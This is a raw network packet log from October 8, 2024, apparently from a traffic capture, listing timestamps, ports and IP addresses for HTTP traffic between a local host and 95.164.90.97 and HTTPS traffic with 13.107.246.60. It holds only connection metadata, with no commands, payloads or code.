Oct 8, 2024 20:47:25.044321060 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.044363976 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.044388056 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.044399023 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.044410944 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.044433117 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.044446945 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.044481039 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.044493914 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.044508934 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.044519901 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.044523001 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.044555902 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.050712109 CEST	443	49787	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.050784111 CEST	443	49787	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.050908089 CEST	49787	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.051033974 CEST	49787	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.051054001 CEST	443	49787	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.051071882 CEST	49787	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.051079035 CEST	443	49787	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.053756952 CEST	49792	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.053795099 CEST	443	49792	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.053870916 CEST	49792	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.054029942 CEST	49792	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.054037094 CEST	443	49792	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.077231884 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.077295065 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.077305079 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.077316046 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.077367067 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.077373981 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.077416897 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.077558041 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.077568054 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.077579975 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.077594042 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.077608109 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.077635050 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.077688932 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.077699900 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.077712059 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.077723026 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.077735901 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.077739954 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.077749968 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.077753067 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.077784061 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.077940941 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.077950954 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.077961922 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.077986956 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.078003883 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.078087091 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.078099966 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.078114986 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.078126907 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.078140974 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.078169107 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.078327894 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.078339100 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.078349113 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.078361988 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.078372955 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.078377962 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.078385115 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.078397036 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.078398943 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.078408957 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.078418016 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.078421116 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.078433990 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.078460932 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.078635931 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.078646898 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.078658104 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.078681946 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.078694105 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.078764915 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.078777075 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.078787088 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.078797102 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.078811884 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.078840971 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.078974962 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.078985929 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.078999043 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.079010963 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.079022884 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.079025984 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.079034090 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.079047918 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.079056025 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.079058886 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.079078913 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.079094887 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.079313040 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.079324007 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.079336882 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.079348087 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.079358101 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.079360962 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.079370022 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.079392910 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.079399109 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.079417944 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.079437017 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.079611063 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.079621077 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.079631090 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.079643965 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.079654932 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.079658985 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.079670906 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.079684019 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.079687119 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.079698086 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.079699993 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.079726934 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.079749107 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.079943895 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.079957008 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.079967022 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.079977989 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.079988956 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.079996109 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.080001116 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.080013990 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.080023050 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.080039024 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.080063105 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.080172062 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.080234051 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.080244064 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.080277920 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.080379009 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.080390930 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.080401897 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.080415010 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.080425978 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.080427885 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.080444098 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.080468893 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.080614090 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.080624104 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.080634117 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.080646038 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.080657959 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.080667973 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.080670118 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.080682993 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.080684900 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.080703974 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.080718994 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.080857038 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.080868006 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.080878019 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.080892086 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.080903053 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.080903053 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.080915928 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.080933094 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.080949068 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.081146955 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.081157923 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.081167936 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.081178904 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.081191063 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.081197023 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.081202984 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.081214905 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.081218958 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.081227064 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.081238985 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.081243038 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.081253052 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.081285954 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.081829071 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.081873894 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.081882000 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.081893921 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.081921101 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.082027912 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.082037926 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.082048893 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.082061052 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.082072973 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.082075119 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.082096100 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.082106113 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.130984068 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.130996943 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.131006956 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.131047964 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.131078005 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.131107092 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.131118059 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.131128073 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.131139994 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.131158113 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.131184101 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.131395102 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.131432056 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.131443024 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.131480932 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.131521940 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.131534100 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.131545067 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.131555080 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.131568909 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.131584883 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.153975010 CEST	443	49789	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.154635906 CEST	49789	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.154661894 CEST	443	49789	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.155143976 CEST	49789	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.155163050 CEST	443	49789	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.164295912 CEST	443	49788	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.164632082 CEST	49788	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.164657116 CEST	443	49788	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.164675951 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.164690018 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.164702892 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.164715052 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.164726019 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.164738894 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.164738894 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.164752007 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.164763927 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.164764881 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.164789915 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.164804935 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.164828062 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.165025949 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.165030956 CEST	49788	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:25.165035963 CEST	443	49788	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:25.165039062 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.165049076 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.165071964 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.165088892 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.165092945 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.165105104 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.165116072 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.165127039 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.165137053 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.165149927 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.165177107 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.165189028 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.165210962 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.165224075 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.165234089 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.165235043 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.165246964 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.165254116 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.165261984 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.165273905 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.165301085 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.165411949 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.165422916 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.165431976 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.165442944 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.165452957 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.165456057 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.165465117 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.165473938 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.165477037 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.165491104 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.165503025 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.165504932 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.165529966 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.165540934 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.165659904 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.165673018 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.165704966 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.165812016 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.165846109 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.165862083 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.165883064 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.165893078 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.165918112 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.165930033 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.165951967 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.165966034 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.165987015 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.165997982 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.166022062 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.166034937 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.166068077 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.166106939 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.166140079 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.166157007 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.166173935 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.166188002 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.166210890 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.166218042 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.166244984 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.166258097 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.166276932 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.166290045 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.166313887 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.166322947 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.166346073 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.166361094 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.166393042 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.166399002 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.166428089 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.166445971 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.166461945 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.166472912 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.166495085 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.166507006 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.166527033 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.166539907 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.166573048 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.166583061 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.166616917 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.166629076 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.166650057 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.166662931 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.166683912 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.166696072 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.166718006 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.166728973 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.166753054 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.166763067 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.166785955 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.166800022 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.166821003 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.166837931 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.166861057 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.166873932 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.166893959 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.166906118 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:25.166929007 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:25.166939974 CEST	49755	80	192.168.2.5	95.164.90.97
